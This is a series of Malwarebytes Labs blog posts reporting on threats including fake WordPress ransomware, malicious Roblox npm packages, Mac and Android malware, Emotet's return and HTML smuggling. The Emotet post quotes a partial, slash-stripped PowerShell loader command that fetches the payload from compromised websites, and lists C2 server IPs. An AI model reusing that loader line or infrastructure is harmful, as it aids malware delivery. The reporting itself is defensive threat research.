IT NEWS

A ransomware warning has appeared out of nowhere and started taking over WordPress sites.

The warning, with its black background and red writing, says:

“SITE ENCRYPTED

{ Countdown }

FOR RESTORE SEND 0.1 BITCOIN:

[address redacted]

(create file on site /unlock.txt with transaction key inside)”

But there’s just one thing… the warning is a fake. There is no ransomware.

The ransomware that isn’t what it claims to be

The warning is clearly intended to scare the site owner into paying the 0.1 Bitcoin ransom amount, which amounts to roughly $6,000 at the time of writing. The countdown clock adds to the intimidation.

Researchers at Sucuri found and analyzed the fake ransomware. When they performed an on-site scan for a file that contained the bitcoin address, they found that the ransomware alert was merely an HTML page that displays the notice and a PHP script that accounts for the timer.

WordPress

WordPress is one of the, if not the most popular content management system (CMS). Of course, this also makes it a primary target for anyone looking to compromise websites. WordPress is an open-source CMS, meaning its source code is public so that anyone can inspect, modify, and enhance. This has resulted in a great many available plugins to add to sites that perform all kinds of tasks, from stopping spammers to incorporating special smileys. You name it, there is a plugin for it.

Unfortunately, not all these plugins have the same level of security, and some even have an ulterior, malicious motive. In this case, it looks as if files were added into the directory of an already present plugin.

Removing the infection

Once the infection was found, it turned out to be easy to remove. All victims had to do is find the file with the bitcoin address in it and delete it. In this case it was the file /wp-content/plugins/directorist/directorist-base.php. Directorist is the name of a legitimate plugin intended to create lists of directories based on location, category, and other interests.

By backtracking changes and looking at the access logs, the researchers found that it is very likely the legitimate plugin was already installed on the website and later tampered with by the attackers. While it was clear that the attacker must have had administrator level access, it is unclear whether they had brute forced the admin password or had acquired the already-compromised login from the black market.

Restoring the website

Deleting the file removed the ransom notice but it also left the researchers with a lot of 404 Not Found responses to internal links on the website. As it turned out, our fake ransomware included a basic SQL command which finds any posts and pages with the “publish” status and changes them to “null“. All the content was still in the database, just unable to be viewed!

Website administrators can undo this effect by using another simple SQL command.

UPDATE `wp_posts` SET `post_status` = 'publish' WHERE `post_status` = 'null';

Please note that this command will also bring back some content that you may have removed yourself, but at least it will bring back all the content that the plugin made invisible.

Under development?

The researchers found indications for the presence of a file called azz_encrypt.php in the directorist directory, but were unable to find the file actually present on any of the infected websites they looked at. So this CMS hijack may be a work in progress that aims to do some actual encryption at one point.

How to protect your WordPress site

If you are running a website, you do not need scares like this one. Besides a possible loss of revenue, it brings in extra work. So what can you do to keep your WordPress site safe?

• When using a CMS, and especially a popular one, you need to keep an eye out for updates—for both the CMS itself and any plugins you have installed. Speed is important, so patch as soon as you are able. Attackers are always aware of the latest vulnerabilities and will scan the Internet for unpatched sites to hijack, sometimes within hours of a patch being made available.
• Create backups regularly (there are plugins for that). If you find out an intruder made changes to your website, it makes things a lot easier for you if you have a recent backup that you can restore without losing too much work, and without having to comb through every piece of code to check if anything else has been tampered with.
• Choose your plug-ins wisely.
• Think about access management. Consider who you allow to make changes to your site, and to what level.
• Use secure passwords (and preferably 2FA) .
• Be wary of SQL injection.
• If you allow uploads, limit the type of files to non-executables and monitor them closely.
• For websites that require even more security, there are specialized vulnerability scanners and application firewalls that you may want to look into. This is especially true if you are a popular target for people that would love to deface or abuse your website.
• If the CMS is hosted on your own servers, be aware of the dangers that this setup brings. Remember that you are relying on open-source code. Running it on your own servers should be met with special precautions to keep it separated from other work servers.

Stay safe, everyone!

The post Fake ransomware warnings hit WordPress sites: How to stay safe appeared first on Malwarebytes Labs.

If your kids play Roblox, you may wish to warn them of ransomware perils snapping at their heels. A very smart, and determined attack has been taking place for a little while now. Although initially dismissed as a form of prank, the developers under fire now disagree. Whether prank or malicious campaign, the end results are still bad for everyone involved. Shall we take a look?

What is Roblox?

If you have younger kids and they play games, they may well have dabbled in Roblox. If so, you’ll have experienced howls of outrage for a few days in October when the entire system came crashing down.

It’s a game, but also much more than that. It’s a place where other users can make their own games inside the Roblox landscape. It’s been around since 2006, and has millions of users. Kids love it because every time they log in, there’ll be something different to do. If they start making content, there’s even the possibility of making money from it.

As you can imagine, this makes it a popular target for scammers and malware authors. As they’re primarily targeting kids, it’s probably a bit easier to go on the offensive than tackling more cautious adults.

What tactics are used to scam Roblox users?

Glad you asked! We covered one such scam last year. Robux is the in-game currency used by players. It can be bought with real money, or earned via creating content (assuming the child is over 13 years of age).

As a result, Robux cash generators are rife and will send gamers off to bogus surveys, malware installs, phish attempts…the usual collection of awfulness.

Outside of Robux generators, phishing and malware generally are popular with scammers everywhere. You can read about typical Roblox experiences here. Not everything is scam central; some of it is just weird, or baffling. Even so, it pays to be on your guard. This is especially applicable in this case. We don’t “just” have scammers targeting the kids directly. What we have here is people trying to place bogus files in locations the players wouldn’t necessarily expect to find them.

We now turn our attention to Noblox, the stepping-stone for scammers to reach their goal of the end users.

Roblox and Noblox

Noblox is a popular way to automate certain in-game Roblox functions. As per its description:

This NPM package enables operations froms the Roblox website to be executed via NodeJS; many individuals leverage noblox.js along side Roblox’s HTTPService to create in-game scripts that interact with the website, i.e. promote users, shout events, and so on, or to create Discord utiltiies to manage their community.

Malicious packages containing ransomware were found to be emulating the real thing.

Noblox.js-proxy imitated noblox.js, deliberately using a name as similar as possible. Meanwhile, Noblox.js-proxies did the same thing to the legitimate noblox.js-proxied. The bad packages had a few hundred downloads between them before being shut down.

The scammers reused certain portions of the real thing, and then dropped dubious code into places users wouldn’t suspect. A little bit of obfuscated code later, and the end result is Trojans dropped onto the target PC, alterations to the Windows registry, and a dash of ransomware to round the whole sorry enterprise off.

When “pranks” start to get serious

This one was arguably well beyond the prank point and had at least one foot in serious territory. A feeling now compounded as the Noblox devs flag at least 6 different libraries aiming to confuse and trap unsuspecting victims.

Although the bogus libraries are being taken offline, the people behind this are making use of Discord to cause additional headaches. Multiple servers exist and are being used to trick younger users into downloading the rogue files. Regular readers will be familiar with the type of Discord messages used for these sorts of antics.

What can Roblox gamers do to avoid these attacks?

As many of the bogus files are being sent in Discord, gamers should be very cautious around anything sent their way. These rogue messages may be sent via DM or posted publicly in a Discord server. They could also arrive via other methods. It’s a tricky one to address, because we’re dealing with younger users who may not be massively tech savvy, versus a confusing selection of package repositories and somewhat technical file names.

If you’re a parent and unsure about your kid’s activity in Roblox, and want to know more about it generally, a good place to start is the Roblox Parents’ Guide. If your kids are making their own games and want to branch out into the kind of package assistance seen above, it may be worth reading the FAQs from the developers. This isn’t a problem that’s likely to go away overnight, and that’s what the scammers and malware authors are banking on.

The post Bogus JS libraries become sustained ransomware threat for Roblox gamers appeared first on Malwarebytes Labs.

Apple’s reputation on security has been taking a beating lately. As mentioned in some of our previous coverage, security researcher Joshua Long recently shone a light on problems with Apple’s security patching strategy. His findings showed a shocking number of cases where Apple patched a vulnerability, but did not do so in all of the vulnerable system versions. Often, systems older than the most current one were left in vulnerable states.

In theory, this could lead to attacks on those vulnerable systems. And new Mac malware that was disclosed on Thursday provides a concrete example of why this is not just theory.

Watering hole campaign discovered by Google

Google’s Threat Analysis Group (TAG) discovered a watering hole campaign in Hong Kong, targeting journalists and pro-democracy political groups. This campaign was using two macOS vulnerabilities to infect Macs that simply visited the wrong web page.

A watering hole attack is one that’s deployed through a website that the desired target is likely to visit, so named because of the way predators will hide near a watering hole that is frequented by their prey.

The vulnerabilities were used to drop malware onto the computer silently, without the user needing to click on anything or even being aware that anything has happened. The malware itself is a pretty full-featured backdoor, but what is most remarkable about it is not its capabilities. This malware has been in the wild, with very few changes, since at least 2019. Back then, it was distributed as a trojan, in an installer disguised as – you’ll never guess – an Adobe Flash Player installer!

Some of the executable files dropped by this installer from 2019 are nearly the same as the ones currently in distribution, but were (as of Thursday) still undetected by any antivirus software.

The vulnerabilities had been fixed… sort of

The first vulnerability used by the malware was CVE-2021-1789, which was a remote code execution (RCE) vulnerability in WebKit. This means that it allowed an attacker to trick WebKit – the foundation of Safari and a number of other browsers – into executing arbitrary code, which is not supposed to be possible.

The second vulnerability, CVE-2021-30869, was a privilege escalation bug. This means that it could be used to run arbitrary code with the highest level of permissions possible when it should not actually have that level of access.

The first of these was patched on February 1, with the release of macOS Big Sur 11.2 and Safari 14.0.3. The latter would have fixed the problem on macOS Catalina (10.15) and macOS Mojave (10.14), if users had upgraded to Safari 14.

The second was apparently also fixed in Big Sur 11.2, on February 1, although it was not originally mentioned in the release notes. Mention of the fix was added on September 23, after Google alerted Apple to the issue and on the same day Apple released Security Update 2021-006 Catalina, to fix the issue in macOS Catalina.

Catalina wasn’t fixed for more than seven months?!

Yes, you heard that right. Apple knew about the vulnerability long before, and fixed it in macOS Big Sur, after the team who found it, Pangu, alerted Apple of the issue. Pangu went on to present their findings in April at the Zer0con security conference.

However, the same bug apparently existed in Catalina, which remained unpatched seven months after Apple released the patch for Big Sur, and more than five months after the details had been released at Zer0con. This allowed attackers to target individuals running Catalina and Safari 13 without detection. (According to TAG, more than 200 machines may have been targeted for infection at the time it discovered the campaign.)

There’s a lot that’s unclear about why this might have happened. Did Apple know that the bug affected Catalina, but chose not to patch it? Was the bug superficially different in Catalina, and thus was missed in a cursory investigation? Or was the bug completely different, but resulted in the same vulnerability? Only Apple could say.

I do find it highly suspicious that mention of this fix was left off of the Big Sur 11.2 release notes, and then added at the end at the same time the bug was fixed in Catalina. That would seem to suggest that it’s something that Apple already knew should have been fixed, or very quickly identified as being the same as the Big Sur bug.

Takeaways

There are a couple things that this incident illustrates quite plainly. First, this throws further weight behind what Joshua Long has taught us; that Apple can only be relied on to patch the absolute latest version of macOS, which is currently macOS Monterey (12). If you are using an older system, you do so at your own risk.

I personally have an older machine still on macOS Mojave, because upgrading to anything newer means I’d lose access to all my old 32-bit Steam games. However, since I’m aware that that system can no longer be considered secure, I limit what I do with it. Any web browsing and other online activities are done with my up-to-date devices, and since I’ve recently migrated to a newer machine, I’ll soon remove my personal data from the Mojave machine.

Second, the fact that this malware went undetected since at least 2019 is, unfortunately, a repeating pattern. There has been a lot of very tightly targeted nation state malware affecting Mac users, and because of the very limited number of victims, it’s hard to detect. Those managing business environments would do well to use some kind of EDR or other monitoring software, but what is an average person to do with their personal Macs?

Some steps you can take to avoid this kind of malware would include:

• Keeping your system and all your software fully up to date
• Be conscious of everything you open on your computer, and be sure you know exactly what it is before you do so
• Never install Adobe Flash Player, whether you think it’s legitimate or not!
• Use an ad blocker (malicious ads can be a source of malware) and some kind of protection against malicious sites, such as the free Malwarebytes Browser Guard
• If you engage in any “risky” activities, consider doing them from a burner device with no access to your data, such as a cheap Chromebook
• If you are a potential target of a hostile nation-state – such as a journalist or human rights activists critical of an oppressive regime, or a member of a group persecuted by a government (such as the Uyghur people in China) – consider consulting with a security professional

Malwarebytes for Mac detects this malware as OSX.CDDS.

The post New Mac malware raises more questions about Apple’s security patching appeared first on Malwarebytes Labs.

Researchers have discovered and analyzed a new Android banking Trojan that allows attackers to steal sensitive banking information such as user credentials, personal information, current balance, and even to perform gestures on the infected device.

According to the researchers, SharkBot demonstrates:

“…how mobile malwares are quickly finding new ways to perform fraud, trying to bypass behavioural detection countermeasures put in place by multiple banks and financial services during the last years.”

Type and source of the infection

A banking Trojan is a type of Trojan specifically created to harvest credentials and other sensitive financial and personal information stored and processed through online banking systems. This particular one, dubbed SharkBot by the researchers, goes beyond that, and uses uses an Automatic Transfer System (ATS) technique to automate the process of stealing funds from users’ accounts.

ATS allows attackers to automatically fill in fields on an infected device with minimal human input. It launches an autofill service to facilitate fraudulent money transfers through legitimate financial service apps. SharkBot uses this technique to bypass behavioral analytics, biometric checks, and multi-factor authentication (MFA).

SharkBot isn’t available in the Google Play Store, so the threat actors would have to convince victims to sideload the app on their device. Sideloading refers to installing an app onto the device by copying the APK installer onto the device and manually installing it on the system, i.e. bypassing the app store. On many devices, in order to sideload apps you would need to obtain root access on the phone, something that often results in users ‘bricking’ their phone or turning it into a $800 paper weight.

Apps like these are often offered for download masquerading as a media player, live TV, or data recovery apps.

Android Accessibility service

In order to use ATS, the Trojan needs access to the Android Accessibility Service. So once SharkBot is installed, the malware asks the users to grant it access to the Android Accessibility service, a feature designed to help physically impaired users interact with their devices by automating certain tasks. SharkBot uses the access to Accessibility Services to perform tasks such as:

• Overlay attacks against multiple applications to steal login credentials and credit card information. Overlay attacks allow the threat actor to show fake benign pop-ups over dangerous ones. This allows them to deceive a victim user into clicking “through” them, performing a specific action (such as accepting a permission)
• Intercept and/or hide SMS messages. This feature is mostly used by threat actors to get the MFA sent by the bank via text messages
• Keylogging, for example to record and send typed passwords to the attacker
• Obtain full remote control of an Android device
• Bypass Android’s doze component and stay connected to the C2 servers

Once the malicious app has been installed, no icon is displayed on the device and SharkBot is able to get all the permissions needed thanks to the enabled Accessibility Services. This is done by clicking instantly on the popup shown to the user.

Targets

Analysis of the samples revealed 22 different targets, including international banks from the UK and Italy and five different cryptocurrency services. So far, infections have been found in the UK, Italy, and the United States. As the app appeared to be in the development stage, the number of targets is likely to grow over time.

Detection

SharkBot uses different anti-analysis and detection techniques, in particular:

• Obfuscation to slow down the static analysis and “hide” all the commands and important information used by the malware
• Anti-emulator. When the malicious application is installed on the device, it checks if the device is an emulator or a real phone
• Modular in that it uses an external ATS module. Once installed, the malware downloads an additional module from the C2. The external module is a “.jar” file that contains all the functionality used to perform the ATS attacks. So this functionality can not be found when analyzing the apk
• Hide the icon of the app from the device screen
• Anti-delete. Like other malware, SharkBot uses the Accessibility Services to prevent the user from uninstalling the malicious application from in Settings
• Encrypted communication. All the communication between the malware and C2 are encrypted and encoded with Base64. In addition to this, SharkBot uses a Domain Generator Algorithm (DGA).

Malwarebytes detects SharkBot as Android/Trojan.BankBot.SHRK.

Stay safe, everyone!

The post SharkBot Android banking Trojan cleans users out appeared first on Malwarebytes Labs.

If you haven’t heard of SoSafe Chat, you will now.

This Android app, purported as a secure messaging application that uses end-to-end encryption, is the latest ruse cybercriminals put upon smartphone users, particularly those based in India, to infect their devices with GravityRAT, a piece of malicious software that is known to spy on people and steal their data.

According to Cyble Research Labs, the latest version of GravityRAT can now track locations of its targets, exfiltrate cellular network data, and record audio. Below is the complete list of GravityRAT’s malicious behavior:

• Read SMS, call logs, and contacts data
• Change or modify system settings
• Read current cellular network information, the phone number and the serial number of the victim’s phone, the status of any ongoing calls, and a list of any phone accounts registered on the device
• Read or write the files on the device’s external storage
• Record audio
• Get connected network information
• Get the device’s location

The history of GravityRAT

This remote access Trojan (RAT) was first discovered in infected Windows computers in 2017 by the Indian Computer Emergency Response Team (CERT-IN), but it has been active since at least 2015. An advanced persistent threat (APT) group with origins in Pakistan was believed to be behind the creation and initial attacks using the RAT.

CERT-IN had described GravityRAT as “unlike most malware, which are designed to inflict short term damage. It lies hidden in the system that it takes over and keeps penetrating deeper. According to latest inputs, GravityRAT has now become self aware and is capable of evading several commonly used malware detection techniques.”

Knowing India and Pakistan’s longstanding historical and political conflict, it’s no surprise to see GravityRAT coming back to target high profile individuals in India once more. The first time threat actors attempted this was when they homed in on the Indian armed forces in 2018.

SoSafe markets itself as an encrypted message platform that worries about the security of its users.

SoSafe chat is not just another chat application, but an application that encrypts your messages whether it is text,images,voice notes,videos.”SoSafe” is available to talk to your loved ones when all the other applications secretly steal your chat data even when they say they do not. We at “SoSafe” ensure that the security of our customers remain our top priority. Be safe with “SoSafe”.

— SoSafe Chat website marketing blurb

BleepingComputer thinks that the above website “likely played a role in the distribution of the app”, and that users are likely get directed to it via malvertising and other known means like social media and instant messages.

It’s also likely that targeted users were messaged privately, since quick searches on top social media sites turned up empty.

How to stay safe

This is a good time to remind readers to never download apps from sites you haven’t heard about. It’s still much, much safer to download apps from the Google Play Store. Just make sure you enable Google Play Protect before you download apps.

Lastly, if you use an antivirus for your Android device, always make sure you are using the latest version.

Stay safe!

The post SoNot SoSafe: Android malware disguises itself as secure messaging app appeared first on Malwarebytes Labs.

You might think looking up an illegal act online, and then visiting a website claiming to be all about doing said act, would be a huge mistake. Nobody would do this, right? Right?

It’s too wild to contemplate. You can barely move online for warnings about tracking or tracing. Even your web browser tells you when your activities aren’t hidden from your ISP or people running the network. As we’re about to see, lots of people simply don’t notice, or understand, such warnings. They just know they need someone to pay the price in a hurry.

As Europol said last week, some of the nastiest aspects in this realm lurk on the dark web – from threats of violence and exploitation, to drugs and criminal market services, they’re all there somewhere.

However…

Those folks I mentioned who don’t realise the massive problems they’re about to stumble into? They will go on the plain old internet and call up all manner of dubious sites and services without barely a second thought. Some will look for drugs. A few might want guns.

Others will take the elevator straight to the top floor of Disastrous Life Choices Incorporated.

Of websites and hitmen

A Michigan resident, Wendy Lynn Wein, has pleaded guilty and faces up to 9 years in prison for trying to have her ex-husband murdered via a hitman website. 

The hitman website was not in fact ready to cater to all her stealth assassination needs. It was a fakeout. Unbeknown to the would-be hitman hirer, she left a message of requirements along with a pseudonym.

This wasn’t enough to save her from the long arm of the law, however. The site owner contacted local law enforcement, and they sprang into action.

Shady meetings in a cafe might seem like a good idea, but probably not when the hitman sitting opposite you is an undercover detective. Wein explained what she wanted doing, and told the detective the potential victim’s work/home address and work schedule. She also offered up to $5,000 for the dirty deed, and then to seal the “Oh no, what have you done” deal handed over $200 as a downpayment.

A land of domain confusion: Part 1

I thought it’d be interesting to trace the legacy of the hitman website. How long had it been around for? Was it always used in this way? Unfortunately, things took a strange turn after digging into the URL mentioned on some news sites.

What I assumed was the hitman site has been around since at least 2004. Back then, it was redirected to a .(ru) domain. After that, it seems to have alternated between a blank page or one of those ad-laden search portals when the owner isn’t making use of the URL or it’s expired. It seems to have remained like that all the way up to the last couple of years. The final entry for the site on Internet Archive still shows an unused domain as recently as 2018.

There is no archiving of its most recent incarnation, most likely because the owner set it to not be indexed in some way (or it didn’t get scraped by the Archive’s crawlers in time).

Or, at least, that’s what I thought. Multiple news portals list the domain as rent-a-hitman(dot)com. That’s the URL I’ve just been describing via Internet Archive.

Guess what? That’s the wrong website!

A land of domain confusion: part 2

One news portal references some of the text from the alleged website and mentions a “point and click solution”, along with the site being compliant with the “Hitman Information Privacy and Protection Act of 1964”. This is a jokey reference to HIPPA, which many but the most observant of visitors would miss.

If you go hunting for this in various search engines, it returns the website rentahitman(dot)com. Notice the lack of hyphens! This is definitely the correct website.

It contains not only the HIPPA joke above, but lots of other fun features including a “merchandise coming soon” banner, the claim of more than “17,985 US based field operatives”, and the wonderful statement that “The dark web is not safe, but RAH is”. They even throw in a “Capisce”, just to stress the silliness of it all.

I did chuckle at the classic “Has your credit card been stolen on the internet” ad on the front page, complete with a fake card number entry box which simply redirects to the Internet Crime Complaint Center.

A slight diversion, then, but a good cautionary tale to make sure the URLs referenced in the news are the right ones. This seems even more important when talking about websites which may or may not provide assassination services.

The genesis of Rent A Hitman

How and why did this website come to be, you may ask. Well, this tale stretches back to at least July 2019. The creator, Bob Innes, set it up as a play on words (website page visit “hits”, as opposed to baffling acts of murder). After a while he had no use for it, and nobody wanting to purchase the URL. He bought the domain in 2005, so weirdly it isn’t that far off from the domain wrongly flagged as the genuine Rent a Hitman site.

Soon finding his email buried (best choice of words?) in hundreds of assassination requests, he took action on one in particular which seemed pretty insistent about having someone killed. A quick conversation with a law enforcement friend and an arrest later, and Rent a Hitman was suddenly in business as the Anti-Hitman Hitman Portal. Or something along those lines.

You’d think being so overt about the joke-laden website would ruin the objective of “save lives by preventing murders” and yet, as he notes, the requests keep rolling in. He’s able to direct dubious requests to law enforcement, and highlight how easily people will turn to bad actions at the same time.

That’s quite the talent, and it’s one we hope Bob will keep on using for a long time to come.

The post When renting a hitman online goes horribly wrong appeared first on Malwarebytes Labs.

Probably one of the best known threats for the past several years, Emotet has always been under intense scrutiny from the infosec community. On several occasions, it appeared to take an early retirement, but then again it was back.

However, when multiple law enforcement agencies seized control of its botnet and took it down in January 2021, confidence was much higher that Emotet and the people behind had finally called it quits. Not only had the infrastructure been dismantled, but previously infected computers had received a special update that would effectively remove the malware at a specific date.

Out of the woods again

On November 15, security researchers who’ve tracked Emotet announced that the threat was back. Emotet’s long-time partner in crime TrickBot was helping it out by using already infected machines to download the new Emotet binary.

To prove this was no hiccup, malspam campaigns distributing Emotet resumed as well with the classic Office document lures containing macros.

These documents with extension .doc(m) and .xls(m) are the initial loader that will call out to one of several compromised websites to retrieve the Emotet payload proper using the following command:

C:WindowsSystem32cmd.exe C:WindowsSystem32cmd.exe c start B powershell $dfkj=$strs=http:visteme.mxshopwp-adminPP,https:newsmag.danielolayinkas.comcontentnVgyRFrTE68Yd9s6,http:av-quiz.tkwp-contentk6K,http:ranvipclub.netpvhkoa,https:g

After execution, Emotet will talk to its command and control (C2) servers and await further instructions.

A return of malspam waves and ransomware?

So far everything indicates that Emotet has restarted their successful enterprise. We should expect malspam campaigns to ramp up in the coming weeks.

In the past month, there have been a number of arrests against ransomware operators along with the creation of taskforces collaborating across borders. The return of Emotet could very well mean an increase in ransomware attacks.

Malwarebytes users are already protected against Emotet thanks to our anti-exploit layer blocking the malicious documents from downloading their payload.

Indicators of Compromise (IOCs)

Emotet C2 servers:

103[.]75[.]201[.]2
103[.]8[.]26[.]102
103[.]8[.]26[.]103
104[.]251[.]214[.]46
138[.]185[.]72[.]26
178[.]79[.]147[.]66
185[.]184[.]25[.]237
188[.]93[.]125[.]116
195[.]154[.]133[.]20
207[.]38[.]84[.]195
210[.]57[.]217[.]132
212[.]237[.]5[.]209
45[.]118[.]135[.]203
45[.]142[.]114[.]231
45[.]76[.]176[.]10
51[.]68[.]175[.]8
58[.]227[.]42[.]236
66[.]42[.]55[.]5
81[.]0[.]236[.]93
94[.]177[.]248[.]64

The post TrickBot helps Emotet come back from the dead appeared first on Malwarebytes Labs.

The mechanisms for memorialising the social network accounts of people who’ve died haven’t really suffered a lot of scrutiny up until now. I’ve done a fair amount of research on the processes and perils we face in the digitally deceased age.

Traditionally, the biggest issues in this space tended to be surprise returns from the beyond. When someone is definitely dead but their accounts spring back into action, it can be incredibly disturbing for their loved ones.

This happens by accident, or deliberately. Sometimes a relative with access to the account of the departed starts tweeting, or accidentally posts a message. Other times, the account is compromised and used to spam, or just troll.

A combination of weak security and the possibility of continued access to an account allows for this to happen.

What you may not be expecting, is for the process to happen in reverse.

When reports of your demise are rather premature…

What if you’re able to convince a platform that someone who is alive and well has actually passed on?

This issue has faced multiple individuals over the past month, but the tale has an additional twist: In this specific case, we don’t have a regular social media user finding out a random platform thinks they’ve died. We have the head of Instagram locked out of their own Instagram account, because somebody exploited its memorialisation feature.

Well, I promised you a twist.

What is Instagram’s memorialization feature?

Instagram’s memorialization feature is a way to preserve the digital legacy of a user for friends and family. As per Instagram’s FAQ page:

Memorialized accounts are a place to remember someone’s life after they’ve passed away. Memorialized accounts on Instagram have the following key features:

• No one can log into a memorialized account.
• The word Remembering will be shown next to the person’s name on their profile.
• Posts the deceased person shared, including photos and videos, stay on Instagram and are visible to the audience they were shared with.
• Memorialized accounts don’t appear in certain places on Instagram, like Explore.

Once memorialized, no one will be able to make changes to any of the account’s existing posts or information. This means no changes to the following:

• Photos or videos added by the person to their profile.
• Comments on posts shared by the person to their profile.
• Privacy settings of their profile.
• The current profile photo, followers or people the person follows.

This is one of the more strict, locked down approaches I’ve seen in this realm. Some sites allow people to continue posting, or make updates. This is particularly the case if the deceased is a known public figure, or the spokesperson for a person, charity or other organisation. In those cases, a close relative may be allowed to continue posting. That isn’t the case here, and the account is indeed memorialised in every sense of the word.

Checks and balances

Instagram doesn’t mention what checks it makes to ensure nothing suspicious takes place, but it does say it has fewer people available to review memorialization reports due to COVID. It’s possible this also impacted what happened next.

Fake memorial pages aren’t a new phenomenon. Convincing someone at an organisation that their reasonably public-facing boss is dead, feels a bit fresher.

This is the situation Adam Mosseri found himself in after a scammer convinced Instagram support that Mosseri was dead. All it took was a fake memorial, easily thrown together online or via the DIY route. As Instagram requires a death certificate or an obituary/news article, the latter was all it took to ease the scam through in September of this year.

The reports on this don’t say how long he was locked out for, except that it was resolved “quickly”.

For unverified, regular users, the person behind these tactics doesn’t even need to whip up a fake notice. They simply grab a recent genuine online obituary of somebody with the same name. As long as the obituary is from the same week as the bogus memorialization request, “98%” of the time it goes through within one to two days.

Paying the piper

This tactic does of course involve money, with “most requests” coming from paying customers. We don’t know if this particular incident was a paid request or just a way to make the tactic more visible. Getting people banned from services is another trick which was popular back in the days of Myspace, and it remains so to this day.

Discovering a contact online has died is a profound shock. If someone manages to switch an account to some form of memorial page, the impact is immediate for both people who see it and the person themselves.

Tightening up the process?

It’s possible services may have to become a little more strict about the evidence required for memorializing accounts. Perhaps more pieces of evidence, or genuine links online which corroborate the request. Of course, asking for specific services as proof only will likely exclude many people. What if those services are only available in certain regions? How about the cost…will folks be priced out in this new digital world of verified death?

It remains to be seen, but this story is a good reminder that scammers will target absolutely anything they can to get the job done. It’s up to the services we use to find new ways to be ever more vigilant and keep our digital identities ticking over for the time being.

The post Instagram’s memorialize feature abused to memorialize…Instagram’s boss appeared first on Malwarebytes Labs.

Microsoft Threat Intelligence Center (MSTIC) last week disclosed “a highly evasive malware delivery technique that leverages legitimate HTML5 and JavaScript features” that it calls HTML smuggling.

HTML smuggling has been used in targeted, spear-phishing email campaigns that deliver banking Trojans (such as Mekotio), remote access Trojans (RATs) like AsyncRAT/NJRAT, and Trickbot. These are malware that aid threat actors in gaining control of affected devices and delivering ransomware or other payloads.

MSTIC said the technique was used in a spear-phishing attack by the notorious NOBELIUM, the threat actor behind the noteworthy, nation-state cyberattack on SolarWinds.

How HTML smuggling works

What is HTML smuggling?

HTML smuggling got its name from the way attackers smuggle in or hide an encoded malicious JavaScript blob within an HTML email attachment. Once a user receives the email and opens this attachment, their browser decodes the malformed script, which then assembles the malware payload onto the affected computer or host device.

Usually, malware payloads go through the network when someone opens a malicious attachment or clicks a malicious link. In this case, the malware payload is created within the host. This means that it bypasses email filters, which usually look for malicious attachments.

HTML smuggling is a particular threat to an organization’s network because it bypasses customary security mitigation settings aimed at filtering content. Even if, for example, an organization has disabled the automatic execution of JavaScript within its environment—this could stop the JavaScript blob from running—it can still be affected by HTML smuggling as there are multiple ways to implement it. According to MSTIC, obfuscation and the many ways JavaScript can be coded could evade conventional JavaScript filters.

HTML smuggling isn’t new, but MSTIC notes that many cybercriminals are embracing its use in their own attack campaigns. “Such adoption shows how tactics, techniques, and procedures (TTPs) trickle down from cybercrime gangs to malicious threat actors and vice versa … It also reinforces the current state of the underground economy, where such TTPs get commoditized when deemed effective.”

Some ransomware gangs have already started using this new delivery mechanism, and this could be early signs of a fledgling trend. Even organizations confident with their perimeter security are called to double back and take mitigation steps to detect and block phishing attempts that could involve HTML smuggling. As we can see, disabling JavaScript is no longer enough.

Staying secure against HTML smuggling attacks

A layered approach to security is needed to successfully defend against HTML smuggling. Microsoft suggests killing the attack chain before it even begins. Start off by checking for common characteristics of HTML smuggling campaigns by applying behavior rules that look for:

• an HTML file containing suspicious script
• an HTML file that obfuscates a JS
• an HTML file that decodes a Base64 JS script
• a ZIP file email attachment containing JS
• a password-protected attachment

Organizations should also configure their endpoint security products to block:

• JavaScript or VBScript from automatically running a downloaded executable file
• Running potentially obfuscated scripts
• Executable files from running “unless they meet a prevalence, age, or trusted list criterion”

BleepingComputer recommends other mitigating steps, such as associating JavaScript files with a text editor like Notepad. This prevents the script from actually running but would let the user view its code safely instead.

Finally, organizations must educate their employees about HTML smuggling and train them on how to respond to it properly when encountered. Instruct them to never run a file that ends in either .js or .jse as these are JavaScript files. They should be deleted immediately.

Stay safe!

The post Evasive maneuvers: HTML smuggling explained appeared first on Malwarebytes Labs.

If you received a scary missive from what appears to be from the FBI over the last few days, you’re not alone. The emails, which may have reached as many as 100,000 people, blamed a fictitious cyberattack on an innocent party. The mail read as follows:

Our intelligence monitoring indicates exfiltration of several of your virtualized clusters in a sophisticated chain attack. We tried to blackhole the transit nodes used by this advanced persistent threat actor, however there is a huge chance he will modify his attack with fastflux technologies, which he proxies trough [SIC] multiple global accelerators.

Now, if you know your way around your network or have some insight into security generally, this may already sound a little off. The typo also doesn’t help. But for anyone else, the email could be very concerning, not least because of the potential for reputation damage for them and their business!

How did this happen?

An FBI server was used to send out these mails. The server itself was a tiny link in the chain known as LEEP. This is a “secure platform for law enforcement agencies, intelligence groups, and criminal justice entities. It includes active shooter initiatives, blogs, forums, and a “Virtual Command Center”. Unfortunately, for a short period of time it also included bogus attack mail notifications.

The website contained a flaw which allowed for the leaking of one time registration passcodes in the website’s HTML. From there, it was a short step to editing requests sent to the browser and changing the text in the intended message subject field.

The FBI has explained the server was geared towards pushing notifications only. It isn’t part of the FBIs corporate email network, and so no PII or other data was compromised.

The damage could have been much worse

It’s certainly embarrassing for a law enforcement service to be abused in this way. It’s also worrying for anyone who’s received the mail and isn’t yet aware it’s a fake.

We’re just lucky the aim of the game here seems to have been trolling (unless you’re the innocent party, of course. There’s definitely nothing lucky about that). Think how much more impact this could have had if the mail had come with a malicious attachment, or was part of a social engineering data harvesting extravaganza.

Once an attacker seizes control of official law enforcement comms tools the possibility for incredibly malicious activity is high. This one is all about the short sharp shock, but there’s plenty of time to think about a slow, drawn-out campaign with subtle missives and a gradual tightening of the web.

Should you ever receive what appears to be a mail warning of attacks at your organisation from law enforcement, consider phoning up and going directly to the (assumed) source. It’ll save you a lot of stress, time, and effort.

The post FBI server hijacked to send up to 100,000 bogus attack mails appeared first on Malwarebytes Labs.